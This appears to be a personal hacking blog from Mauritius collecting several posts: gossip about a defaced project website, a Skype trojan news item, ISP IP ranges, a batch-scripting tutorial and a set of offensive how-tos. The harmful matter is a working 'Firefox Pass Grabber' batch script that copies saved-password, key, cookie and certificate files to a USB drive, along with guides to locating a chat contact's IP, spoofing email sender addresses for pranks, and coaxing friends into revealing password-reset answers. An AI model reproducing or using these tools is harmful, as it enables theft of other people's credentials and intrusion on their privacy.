Maurice Ile Durable Website hacked

Maurice Ile Durable project's website was launched i think in March and a short time after, the Website was found to have been hacked.

MIR project grabbed the domain www.maurice-ile-durable.com for this purpose, but for quite an extended period of time instead of the actual website,the website hoster's advertising was displayed on the site. I find it strange that it was OVH web services. A web solution provider from France.
http://www.ovh.com/fr

I suppose a defacement was made and MID decided to remove the contents from the actual hoster. But no atempt was made to implement a backup copy or another version of the website untill recently. Indeed a simple banner indicating that the website will be migrated is being displayed actually on www.maurice-ile-durable.com

That would mean that nothing was done in this whole time to come up with a solution after the defacement.

Anyways, that showz how much MID cares about its online presence and it's only window to the online world. No wonder they implemented a shitty website full of vulns that lead to the easy defacement of it, or maybe not..

When you think of it, who would take the painstaking task of searching for vulns and deface the MID project website. Who would be against the project..

i maybe thinking that the hack may have come from the implementers themself. They got paid less or not at all or something like then then they decided to blow the fuck up. And why they fuck they hosted it with a foreign hoster and not on the government servers.

Actually the website is still hosted (atleast the banner :) ) on a dedicated server at OVH (France)

Anywayz we'll see where they migrate to..

Finding the IP address of your friend on MSN.

This does not only work for MSN but for also any other messengers : Digsby/Google talk ect...
While several ways exist, i will focus on this one, which i think is the easiest and doesn't require any third party software/script.

What you will need: MSN messenger (of course) and a Command Prompt Window.

1# First close all internet applications like your browser or any other IM  softwares you use. (To reduce the number of connections on your box)

2# Login into your Messenger.

3# Copy this line : netstat -n -o 3 >>c:\MSN-iplog.txt

4# Open a command prompt window

5# Get ready to initiate a file transfer to the friend.
  (any file that will take atleast 30 seconds to transfer is fine)

6# Paste the line you copied in step 3 to the command prompt and press Enter.
   (The window will be idle, thats normal becuase its writting to disk)

7# Initiate the file transfer to your friend

8# Once the file transfer is complete, wait for 10 seconds and type (control+c)    in the command prompt window (that will stop the logging)

9# Now open the log file named MSN-IPlog created in c:\

10# Search for an IP that was not here at the beginning and at the end of the log but was constantly logged   throughout the middle of the log.

Thats all for now, i may post other methods for finding ips when i have time :))

Skype Users Targeted by Trojan

You all know of Skype.. That app that allows calls to be made from PC to PC..I used it once, but didn't like the layout and was doughty about it's security.

Well, TrendLabs researchers were alerted of a newly released Proof-of-Concept (PoC) that listens and records voice calls carried out via Skype. Trend Micro detects this as TROJ_SPAYKE.C. Skype is a popular application used for making voice over IP (VoIP) calls.

Upon execution, the DLL component (also detected as TROJ_SPAYKE.C) intercepts Skype traffic and hooks the send and receive APIs. This is done before Skype encrypts the traffic it sends to other users. This enables the Trojan to save all gathered information as audio files, which could then be sent to a malicious user.

This poses no threat as of the moment; it only collects information but does not decrypt the said information and consequently send it to a remote user. However, future attacks that do engage in information theft cannot be rules out.

Users are advised not to give away any crucial information when conversing online to prevent info theft. Trend Micro protects users from this attack through the Trend Micro Smart Protection Network.

Source from: TrendLabs | Malware Blog

My favourite Forum Hacked ? Government Security.Org

Was Governmentsecurity.org, my favourite security forum hacked?
I do not care for my user credentials that i used there, but i do care for the skills of the hacker that put this up.
But it's not so sure that the forum was hacked but Security Shell did post the stuff on its blog :
Apparently from an el8 hacker named JustRulz

Another underground forum defaced by JustRulz.Think at an new IPB 0-day ?

How I hacked governmentsecurity.org ?

Director: JustRulz ~ naylonsebeke(at)hotmail(dot)com

####################################################################################
-[0x11]- Intro

It was very rainy day haha : xD. . . ı was checking recent exploits and testing some of latest kernel bugs on my boxes.
Than,ım entered governmentsecurity.org web page.Their web design is very cool (H) :lol , finally ı decided to test
their server security and test my own 0day exploit.

0day exploit for Power Board!!! Dude if that is true, therez practically nothing that could be done against that.

Mari bon li bon ca.. :-|

Facebook : SQL Injection Flaw

Facebook, a website with an estimated of 5 to 10 Million in US Dollars, a number of 250-1000 employees, a website ranked number 8 GLOBALLY by alexa.com’s traffic standards, is not capable of securing their data base. Millions (LOTS OF MILLIONS) of accounts, email addresses and passwords up for grabs by anyone. Let me show you a few concrete examples of vulnerable parameters.
Source: Hacker Underground

Not only is the website vulnerable to sql injection but it also allows load_file to be executed making it very dangerous because with a little patience, a writable directory can be found and injection a malicious code we get command line access with wich we can do virtualy anything we want with the website: upload phpshells, redirects, INFECT PAGES WITH TROJAN DROPPERS, even deface the whole website.

Basically, Facebook is no safer than any other site, but given the huge benefits it makes, it got the resources to pay its attackers so that the info is not made public. But nevertheless, those who are not interested in money but security do make these info public.
Facebook has also been found to be vulnerable to Blind SQL.

Emtel IP address range

I came to know of this range recently.

196.192.80.0 - 196.192.83.255
Emtel GSM 2G & 3G

Click here for a full list of Mauritian IP ranges.

Sending Fake Emails to anyone

I have seen this being spammed over the net by script kiddies pretending that it allows faked emails to be sent to any phone number.
Indeed this trick can send forged emails to any mobile number.

For example you could send a mail appearing to originate from your friends email address to his mobile.
Am sure he/she will be wondering WTF happened.. Did my email acc get hacked.

How to do it?

Grab a Nokia phone.
Go to Messages and Select SMS e-mail
In the E-mail address field, enter the fake email you want. (anyone that you like)
Input the Subject and the message contents
Now the trick:
Instead of inputting the E-mail Server Number, input your friends mobile number
Send

Your friend will receive an email message originating from the email address you set

But:
Works only with retarded persons who wouldn't check the Advanced Message details.
Indeed your number appears as the E-mail Server Number in Message Details.
That is if your friend understands what an email server is and if he bothers to check the number in his phonebook.

I tried that one and works out very well. Tested on Emtel network.
Very nice to pull pranks on stupid friends.

Social Engineering

Social Engineering is the art of manipulating a person into revealing sensitive information. Social Engineering is the best hacking tool you can use, in my opinion. Similar to using a computer program to make another system spew out amounts of valuable information about the machine, that an attacker can later use. Think of it as "people hacking". When hacking into system you find a weakness or vulnerability that you can exploit, to gain access to restricted information. Social engineering is taking advantage of a persons weakness and getting them to disclose confidential information. All it takes is a large amount a confidence and basic knowledge of human nature and social behavior patterns. Social engineering does not just apply to computer security, it can apply to nearly any situation.

My examples in computer security include chatting with persons and make them split out their hobbies, interests and stuffs like that. It is surprising to see how people tend to put passwords that directly relate to what they like or what they do.

For example there is a great chance that a hardcore fan of transformers would set his passwords as the name of one of the decepticons, concepticons or whatever.

Another example is when you want to trick your friend into giving out his email password. Naturally no one will blatantly give out his password, but you can trick him as to make him split the answer to the secret question that allows resetting of an email password. (bat lakol )
Tip: Neva write something true while setting your secret answer.

This is just the tip of the iceberg when it comes to social engineering. There is much more to cover, but I hope you all learned something. Overtime you will become better at reading and understanding human nature. You will develop your own style of social engineering. There are many more methods that I left out, but these are great to start with. Knowing how to social engineer is a great way to prevent yourself from getting tricked by others. For example, the police use social engineering and forms of manipulation constantly. Others may disagree, but overall I feel this is an important topic to cover.

Stealing FireFox Passwords

Firefox stores saved passwords and login info in encrypted files in the Application data directory.
I am posting a batch file that can grab these files and send them to a removable device.

This batch file has been written by illwill from gso forum and worked for versions 3.5 and below.
I tweaked it a bit for it to work on 3.5 and above.
When run, the program copies the files to a folder GenuineCheck\Msdos on the following removable drives: E,F,G,H
So for it to work, you must create a folder named GenuineCheck and within;Msdos in your removable drive.
This is to avoid that the files are saved to unintended areas.

Naturally, the files are encryted, use FirePassword to decrypt them.

The code is here:

ECHO OFF
COLOR F0
TITLE=::: Firefox Pass Grabber :::

CLS

VER | findstr /i "5.1." > nul
PUSHD "%UserProfile%\Application Data\Mozilla\Firefox"
IF NOT ERRORLEVEL 1 FOR /F "tokens=2 delims==" %%A IN ('TYPE profiles.ini ^| FINDSTR.EXE /R /B /I /C:"Path="') DO SET Profile=%%~nxA
set signons="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\signons.sqlite"
set key="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\key3.db"
set coo="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\cookies.sqlite"
set cert="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\cert8.db"

goto Send

:Send
copy %key% E:\GenuineCheck\Msdos\key3.db
copy %key% F:\GenuineCheck\Msdos\key3.db
copy %key% G:\GenuineCheck\Msdos\key3.db
copy %key% H:\GenuineCheck\Msdos\key3.db

copy %signons% E:\GenuineCheck\Msdos\signons.sqlite
copy %signons% F:\GenuineCheck\Msdos\signons.sqlite
copy %signons% G:\GenuineCheck\Msdos\signons.sqlite
copy %signons% H:\GenuineCheck\Msdos\signons.sqlite

copy %coo% E:\GenuineCheck\Msdos\cookies.sqlite
copy %coo% F:\GenuineCheck\Msdos\cookies.sqlite
copy %coo% G:\GenuineCheck\Msdos\cookies.sqlite
copy %coo% H:\GenuineCheck\Msdos\cookies.sqlite

copy %cert% E:\GenuineCheck\Msdos\cert8.db
copy %cert% F:\GenuineCheck\Msdos\cert8.db
copy %cert% G:\GenuineCheck\Msdos\cert8.db
copy %cert% H:\GenuineCheck\Msdos\cert8.db

ECHO.
ECHO==============================================
ECHO.
ECHO Files haved been saved
ECHO.
ECHO==============================================
ECHO.
PAUSE

Writing Batch Programs

First of all, what is a batch program?
A batch program, also known as a batch file executed a list of commands when run.

#What commands?
Run-->type (cmd)-->help

All these commands can be added to a batch file to be executed.
They are very very useful ;)

#Creating batch files.

Just create a file with the .bat extension
I would recommend creating it using cmd as it would allow you to get a hold of the environment.
Open a cmd window. (Run-->type (cmd)
At the prompt, type: ECHO pause >> c:\mybatch.bat
This will create a batch file in your c:\ directory.
Don't bother about the ECHO and stuff, you will understand in due time.

Now run the created file.
You will get a cmd window asking you to press any key, this is because of the pause command that we directed to the file.

To edit the file, right click and edit. A notepad will open with the first line as "pause"

#Writing your batch file.

Delete the pause line.
Type the following:
ECHO OFF               (this insures that actual commands are not displayed when the file is run)
CLS                    (this clears the screen after the ECHO OFF command has been displayed)
TITLE=Shell            (this set the window title as "shell")
ECHO My name is Farell (this outputs "My name is Farell" in the window)
PAUSE                  (this prevents the program from existing right after executing the commands)

You should get a window like the one below..

#Other things you can do

ECHO OFF
CLS
SET /p myname=Enter you name:
ECHO==============================
ECHO.
ECHO %myname% is fan of hax0rs-sh3ll
ECHO.
ECHO==============================
PAUSE

You should get a window like the one below:


Explanation:
The [set /p myname=]   Asks user for input (/p) and store it in the variable "myname"
[ECHO.]                Displays a blank line on the screen
ECHO [%myname%]        Displays the contents of the variable "myname"

You can set a lot of things using set /p.. The rest is up to your imagination. Type help in cmd :)

#Cool Stuffs

Saving system environment to file.
This batch file will save system info like machine name, user profile path and username to a file named sysinfo.txt
System environment variables can be viewed by typing "set" at a cmd prompt.
As they are variables already defined in cmd, we just need to call them.

ECHO OFF
CLS
SET FILE=c:\sysinfo.txt
ECHO %logonserver% >>%file%
ECHO %userprofile% >>%file%
ECHO %username%    >>%file%
ECHO ((Info Saved))
PAUSE

Explanation:
The >> operator saves the output of the command to the variable %file%

Ending note::
There are a lot of things you can do with batch file, search the net for more tutorial and info.
I will be posting a batch file that copies file contents to a USB disk. Stay rooted :)

Mauritian IP addresses

IP ranges of MRU ISPs
It is good to know the RIR too
Regional Internet Registries

Registry            Geographic Region
AfriNIC            Africa, portions of the Indian Ocean
APNIC             Portions of Asia, portions of Oceania
ARIN               Canada, many Caribbean and North Atlantic islands, and the United States
LACNIC          Latin America, portions of the Caribbean
RIPE NCC       Europe, the Middle East, Central Asia

Mauritius Internet Service providers and their IP range.

#TelecomPlus
196.27.64.0 - 196.27.79.255
196.27.80.0 - 196.27.95.255
Dynamic adsl pool

202.123.0.0 - 202.123.31.255
Dialup pool


#Orange
41.212.128.0 - 41.212.255.255
adsl-pool


#Nomad[NetworkPlus]
41.207.143.0 - 41.207.144.255

41.207.137.0 - 41.207.138.255
Dynamic Wireless - BTS ROSE HILL 2

41.207.138.0 - 41.207.138.255
Dynamic Wireless - La Marie

41.207.139.0 - 41.207.139.255
Dynamic Wireless - Floreal

41.207.140.0 - 41.207.140.255
Dynamic Wireless - Phoenix

41.207.143.0 - 41.207.143.255
Dynamic Wireless - Curepipe



#Data Communications Ltd
196.192.64.0 - 196.192.71.255
Proxy Server @ 196.192.68.8
DCLISP [smartnet and adsl]